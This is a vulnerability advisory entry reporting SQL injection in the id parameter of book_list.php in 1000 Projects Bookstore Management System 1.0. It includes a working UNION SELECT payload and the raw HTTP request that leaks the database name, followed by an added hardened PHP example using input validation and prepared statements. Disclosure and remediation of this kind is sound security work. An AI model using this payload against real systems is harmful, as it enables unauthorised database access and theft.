| Title | 1000 Projects Bookstore Management System v1.0 SQL Injection |
|---|
| Description | A vulnerability classified as serious has been found in Bookstore Management System v1.0. It affects the file book_list.php: SQL injection exists in the id parameter of book_list.php.
Bug authors: 孙一航 (Guangzhou University), 樊琦 (Guangzhou University)
Vendor: https://1000projects.org/bookstore-management-system-php-mysql-project.html
The application was run on XAMPP with PHP 5.6.
Vulnerable file: /bms/book_list.php?id=
Vulnerable parameter: id in /bms/book_list.php?id=
Database name: bms
[+] Payload: /bms/book_list.php?id=-17 union select 1,database(),3,4,5,6,7--+&cat=Web Design (the leaked value is reflected in the main_event_id field)
```http
GET /bms/book_list.php?id=-17%20union%20select%201,database(),3,4,5,6,7--+&cat=Web%20Design HTTP/1.1
Host: 192.168.1.16
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=7hpgkhvc3ujgkqtdko38g42if7
Connection: close
```
 |
|---|
| Source | https://github.com/Sy0ung-cmd/CVE/blob/main/vendors/1000projects/bookstore-management-system/SQLi-1.md |
|---|
| User | SunYihang (UID 77239) |
|---|
| Submission | 11/06/2024 05:35 |
|---|
| Moderation | 11/07/2024 21:41 (2 days later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 283462 [1000 Projects Bookstore Management System 1.0 /book_list.php ID sql injection] |
|---|
| Points | 20 |
|---|
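The injection works because the id value reaches the SQL string unvalidated. The following is an added example, not the 1000 Projects code (which the advisory does not reproduce): it shows a hardened handler for a numeric id parameter such as the one in book_list.php, with the vulnerable concatenation pattern left as a comment for contrast. The table name, column names and connection credentials are assumptions; the database name bms comes from the advisory.

```php
<?php
// Added illustrative example; not the vendor's code. Assumed: a mysqli connection to
// the "bms" database (named in the advisory) and a hypothetical "books" table.
$mysqli = new mysqli('localhost', 'bms_user', 'bms_password', 'bms');

// Vulnerable pattern (hypothetical reconstruction, shown only for contrast):
// the raw id is concatenated into the query, so a value such as
// "-17 union select ..." is executed as SQL instead of being treated as a number.
// $result = $mysqli->query("SELECT * FROM books WHERE id = " . $_GET['id']);

// Hardened version: validate the type first, then bind the value as a parameter.
function load_book(mysqli $db, $raw_id)
{
    // id must be a positive integer; anything else is rejected before it reaches SQL,
    // so the advisory's "-17 union select ..." payload stops here with a 400.
    $id = filter_var($raw_id, FILTER_VALIDATE_INT, array('options' => array('min_range' => 1)));
    if ($id === false) {
        http_response_code(400);
        return null;
    }

    $stmt = $db->prepare('SELECT id, title, author FROM books WHERE id = ?');
    $stmt->bind_param('i', $id);   // bound as an integer, never interpolated into the string
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();   // requires mysqlnd, standard in XAMPP
    $stmt->close();
    return $row;   // null when no book has that id
}

$book = load_book($mysqli, isset($_GET['id']) ? $_GET['id'] : '');
```

The same two controls (type validation plus a prepared statement) apply to any other integer parameter the application reads from the query string; the `cat` parameter in the payload, being a string, still needs the prepared statement even though integer validation does not apply to it.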